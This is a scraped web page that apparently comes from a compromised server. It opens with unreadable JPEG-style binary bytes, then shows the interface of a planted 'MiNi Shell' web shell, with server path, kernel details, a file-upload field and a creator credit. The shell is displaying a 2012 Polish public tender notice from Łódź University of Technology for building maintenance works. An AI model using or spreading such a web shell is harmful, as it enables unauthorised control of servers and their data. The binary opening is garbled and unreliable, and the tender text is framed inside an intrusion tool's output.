JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120423/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120423/128456-N-2012.html

<p class="kh_header"><b>Łódź: Wykonanie bieżących prac konserwacyjnych, doraźnych robót remontowych i napraw awaryjnych oraz czynności niezbędnych do utrzymania w stanie odpowiadającym warunkom technicznym użytkowania budynków Wydziału Elektrotechniki, Elektroniki, Informatyki i Automatyki  (bud. nr A 10, A 11, A 12) ul. Stefanowskiego 18/22 i bud. nr C 3, C 6, C 7 Al. Politechniki 11)</b><br>
<b>Numer ogłoszenia: 128456 - 2012; data zamieszczenia: 23.04.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Politechnika Łódzka, Wydział Elektrotechniki, Elektroniki, Informatyki i Automatyki , ul. Stefanowskiego 18/22, 90-924 Łódź.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie bieżących prac konserwacyjnych, doraźnych robót remontowych i napraw awaryjnych oraz czynności niezbędnych do utrzymania w stanie odpowiadającym warunkom technicznym użytkowania budynków Wydziału Elektrotechniki, Elektroniki, Informatyki i Automatyki  (bud. nr A 10, A 11, A 12) ul. Stefanowskiego 18/22 i bud. nr C 3, C 6, C 7 Al. Politechniki 11).</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zadanie I w branży ogólnobudowlanej:
* wykonywanie bieżących prac konserwacyjnych i zabezpieczających, usług naprawczych, drobnych remontów, usług utrzymania dachów
*  usuwanie ewentualnych awarii i ich skutków, zabezpieczenie doraźne obiektów
* udział w rocznych przeglądach w zakresie sprawności i wartości użytkowej obiektów budowlanych zgodnie 
z obowiązującymi przepisami i normami, z wyszczególnieniem braków i uszkodzeń, które mogłyby spowodować zagrożenia bezpieczeństwa w formie wytycznych do uwzględnienia w zaleceniach przeglądów.
* sporządzanie protokółów rocznych, okresowych przeglądów obiektów określających stan techniczny budynków zgodnie z prawem budowlanym (art. 62) przez osobę uprawnioną branży konstrukcyjno - budowlanej
* wartość robót w okresie umownym nie może przekroczyć 200 000 zł (sumaryczna wartość robót wraz z podatkiem VAT)

Zadanie II w branży instalacyjno-sanitarnej:
* wykonywanie bieżących prac konserwacyjnych i zabezpieczających dotyczących instalacji i urządzeń sanitarnych wraz z koniecznymi robotami budowlanymi, wykonywanie usług naprawczych i remontowych instalacji wewnętrznych i zewnętrznych oraz wykonywanie prób szczelności, drożności przewodów instalacyjnych (usługi dotyczą: instalacji wodociągowej, kanalizacyjnej, c.o, i wentylacyjnej, klimatyzacyjnej).
* usuwanie ewentualnych awarii i ich skutków, zabezpieczenie doraźne instalacji. 
* udział w rocznych przeglądach w zakresie sprawności i wartości użytkowej instalacji wod-kan. c.o. zgodnie z obowiązującymi przepisami i normami, z wyszczególnieniem braków i uszkodzeń, które mogłyby spowodować zagrożenia bezpieczeństwa w formie wytycznych do uwzględnienia w zaleceniach przeglądów.
* sporządzanie protokołów rocznych okresowych przeglądów obiektów określających stan techniczny budynków zgodnie z prawem budowlanym (art. 62) przez osobę uprawnioną branży wod.- kan., c.o. i wentylacyjnej i klimatyzacji - 2012 i 2013 r.
* wartość robót w okresie umownym nie może przekroczyć 200 000 zł (sumaryczna wartość robót wraz z podatkiem VAT)

Zadanie III w branży elektrycznej: 
* wykonywanie bieżących napraw i prac zabezpieczających, dozorem nad prawidłową eksploatacją urządzeń i instalacji elektrycznych oraz wykonywanie usług naprawczych i remontowych tych instalacji wraz z koniecznymi drobnymi robotami budowlanymi
*  usuwanie ewentualnych awarii i ich skutków, zabezpieczenie doraźne i naprawa instalacji
*  wykonanie instrukcji eksploatacji instalacji elektrycznej..
* udział w rocznych przeglądach w zakresie sprawności i wartości użytkowej instalacji elektrycznej i urządzeń zgodnie z obowiązującymi przepisami i normami, z wyszczególnieniem braków i uszkodzeń, które mogłyby spowodować zagrożenia bezpieczeństwa w formie wytycznych do uwzględnienia w zaleceniach przeglądów.
*  przeglądy oświetlenia awaryjnego i ewakuacyjnego, realizacja zaleceń
* sporządzanie protokołów rocznych okresowych przeglądów obiektów określających stan techniczny budynków zgodnie z prawem budowlanym (art. 62) przez osobę uprawnioną w branży elektrycznej - 2012 i 2013 r.
*  wartość robót w okresie umownym nie może przekroczyć 150 000 zł (sumaryczna wartość robót wraz z podatkiem VAT). 

Dane dotyczące budynków, w których będą wykonywane prace: 
Bud. A 10
Powierzchnia zabudowy (m2)  - 2356
Ilość kondygnacji nadziemnych - 5/2, 
Bud. A 11
Powierzchnia zabudowy (m2)   - 965
Ilość kondygnacji nadziemnych  - 5 + poddasze,  
Bud. A 12
Powierzchnia zabudowy (m2)   - 4218
Ilość kondygnacji nadziemnych   - 2,  
Bud. C 3
Powierzchnia zabudowy (m2)   - 950
Ilość kondygnacji nadziemnych    - 8,  
Bud. C 6
Powierzchnia zabudowy (m2)   - 317
Ilość kondygnacji nadziemnych    - 2,  
Bud. C 7
Powierzchnia zabudowy (m2)   - 337
Ilość kondygnacji nadziemnych    - 1. 

Przedmiot zamówienia będzie określony w zleceniach szczegółowych obejmujących niezbędny zakres robót wynikający z bieżących potrzeb z określonym terminem wykonania..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających w kwocie nie większej niż 50% wartości zamówienia w formie i zakresie zgodnym z zgodnie z art. 67 ust 1 pkt 6 ustawy - Prawo zamówień publicznych</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.40.00.00-1, 45.45.30.00-7, 45.33.00.00-9, 45.31.12.00-2, 45.33.10.00-6, 50.76.00.00-0, 79.99.30.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 24.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie jest wymagana wpłata wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek będzie spełniony, jeśli Wykonawca potwierdzi spełnienie warunku poprzez oświadczenie - Załącznik 2 do SIWZ
Ocenę spełniania warunku udziału w postępowaniu zamawiający przeprowadzi na podstawie załączonego do oferty oświadczenia, metodą spełnia-nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca winien udokumentować posiadanie wiedzy i doświadczenia poprzez wykazanie, iż: w okresie ostatnich pięciu lat przed datą wszczęcia niniejszego postępowania o udzielenie zamówienia (daty publikacji ogłoszenia) a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał 4 zamówienia na łączną kwotę co najmniej 200.000,- zł brutto, odpowiadające swoim rodzajem robotom budowlanym stanowiącym przedmiot zamówienia, Wyszczególnienie wykonanych zamówień Wykonawca przedstawi w załączniku nr 4 do oferty z podaniem daty i miejsca wykonania oraz z załączeniem dokumentów potwierdzających, że roboty te zostały należycie wykonane i prawidłowo ukończone. 
Dodatkowo Wykonawca potwierdzi spełnienie warunku poprzez oświadczenie - Załącznik 2 do SIWZ.
Ocenę spełniania warunku udziału w postępowaniu zamawiający przeprowadzi na podstawie załączonych do oferty dokumentów, metodą spełnia-nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek będzie spełniony, jeśli Wykonawca potwierdzi spełnienie warunku poprzez oświadczenie - Załącznik 2 do SIWZ
Ocenę spełniania warunku udziału w postępowaniu zamawiający przeprowadzi na podstawie załączonego do oferty oświadczenia, metodą spełnia-nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca winien dysponować osobami na stanowiskach produkcyjnych posiadającymi doświadczenie i kwalifikacje w wykonywaniu robót budowlanych odpowiedniej branży. 
W zadaniu III dodatkowo wymagane sjest posiadanie świadectw kwalifikacyjnych co najmniej na poziomie wynikającym z rozporządzenia Ministra Gospodarki Pracy i Polityki Społecznej z dnia 20 lipca 2005 r. (Dz. U. 2005 r. nr 141, poz. 1189) w tym w zakresie dozoru D - 1 osoba, w zakresie eksploatacji E - 3 osoby.
Wykonawca winien dysponować osobami do kierowania robotami budowlanymi posiadającymi: 
1) uprawnienia niezbędne do wykonywania prac, wymagane przepisami ustawy Prawa Budowlanego w zakresie kierowania robotami budowlanymi odpowiedniej branży
2) aktualne członkostwo Izby Inżynierów Budownictwa dla osoby posiadającej uprawnienia wymienione w punkcie 1). 
Ocenę spełniania warunku udziału w postępowaniu zamawiający przeprowadzi na podstawie załączonego do oferty wykazu osób - załącznik nr 5 do SIWZ oraz oświadczenia - załącznik nr 2 do SIWZ, metodą spełnia-nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca oświadczy, że posiada opłaconą polisę i będzie posiadał w chwili podpisania umowy polisę lub inny dokument potwierdzający, że jest on ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia co najmniej na kwotę 100 000,00 zł
Warunek będzie spełniony, jeśli Wykonawca potwierdzi spełnienie warunku poprzez oświadczenie - Załącznik 6 do SIWZ oraz załączy kserokopię potwierdzoną posiadanej polisy lub innego dokumentu potwierdzającego ubezpieczenie od odpowiedzialności cywilnej.
Wykonawca potwierdzi spełnienie warunku również poprzez oświadczenie - Załącznik 2 do SIWZ
Ocenę spełniania warunku udziału w postępowaniu zamawiający przeprowadzi na podstawie załączonych do oferty dokumentów metodą spełnia-nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiany umowy będą dopuszczalne gdy:
1. Będą to zmiany korzystne dla Zamawiającego (zastosowanie materiałów o lepszych parametrach, bardziej nowoczesne technologie)
2. Możliwość zmiany terminów może nastąpić w następujących przypadkach wskazanych w umowie:
	a) z przyczyn spowodowanych siłą wyższą jak  * klęski żywiołowe, działania wojenne, terroryzm, zamieszki * warunki atmosferyczne odbiegające od typowych, uniemożliwiające prowadzenie robót budowlanych przeprowadzanie prób i sprawdzeń, dokonywanie odbiorów * nagłych przerw w dostawie energii elektrycznej  * innych obiektywnych przeszkód uniemożliwiających prowadzenie robót, za które nie odpowiada  Wykonawca.
	b) zmiany będące następstwem okoliczności leżących po stronie Zamawiającego w szczególności -  wstrzymanie robót przez Zamawiającego  z powodu zmian harmonogramu zajęć dydaktycznych lub uniemożliwienia dostępu do remontowanych pomieszczeń z innych przyczyn niezależnych. 
3. Zmiana danych Zamawiającego lub Wykonawcy lub osób będących przedstawicielami stron.
	a)  Możliwość  zmiany treści umowy w stosunku do treści oferty w sytuacji, gdy nastąpiła aktualizacja
	danych dotyczących Wykonawcy lub Zamawiającego np.: zmiana nazwy firmy, zmiana adresu siedziby,
	zmiana formy prawnej Wykonawcy.
	b) Możliwość zmiany osób biorących udział w realizacji zamówienia - strony przewidują zmiany w 	
	uzasadnionych przypadkach przy zachowaniu kwalifikacji osób na tym samym poziomie 
	3.4 Możliwość zmiany przy wystąpieniu oczywistych omyłek pisarskich i rachunkowych w treści umowy.
4)   Warunki zmian - na wniosek Wykonawcy lub Zamawiającego z uzasadnieniem Zmiany i uzupełnienia umowy, o których mowa w ust. 3 zostaną dokonane na podstawie protokołów zawierających uzasadnienie zmian i uzupełnień podpisanych przez Strony oraz wymagają aneksu w formie pisemnej pod rygorem nieważności i mogą zostać wprowadzone, jedynie w przypadku jeżeli obydwie Strony umowy (Zamawiający i Wykonawca) zgodnie uznają, że zaszły wskazane okoliczności oraz wprowadzenie zmian jest konieczne dla prawidłowej realizacji zamówienia. np.: prawidłowa realizacja przedmiotu umowy, obniżenie kosztów, zapewnienie optymalnych parametrów technicznych i jakościowych robót, zapewnienie ciągłości prac i reagowania w sytuacjach napraw awaryjnych, wystąpienia siły wyższej lub z powodu działania osób trzecich.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zp.p.lodz.pl  zakładka _Aktualne/Roboty budowlane_<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> POLITECHNIKA ŁÓDZKA
WYDZIAŁ ELEKTROTECHNIKI, ELEKTRONIKI, INFORMATYKI I AUTOMATYKI 
90-924 ŁÓDŹ, ul. B. Stefanowskiego 18/22, 
Biuro Administracyjno - Techniczne, pokój 6, bud. A 12 parter.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.05.2012 godzina 12:00, miejsce: POLITECHNIKA ŁÓDZKA
WYDZIAŁ ELEKTROTECHNIKI, ELEKTRONIKI, INFORMATYKI I AUTOMATYKI 
90-924 ŁÓDŹ, ul. B. Stefanowskiego 18/22, 
Biuro Administracyjno - Techniczne, pokój 6, bud. A 12 parter.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com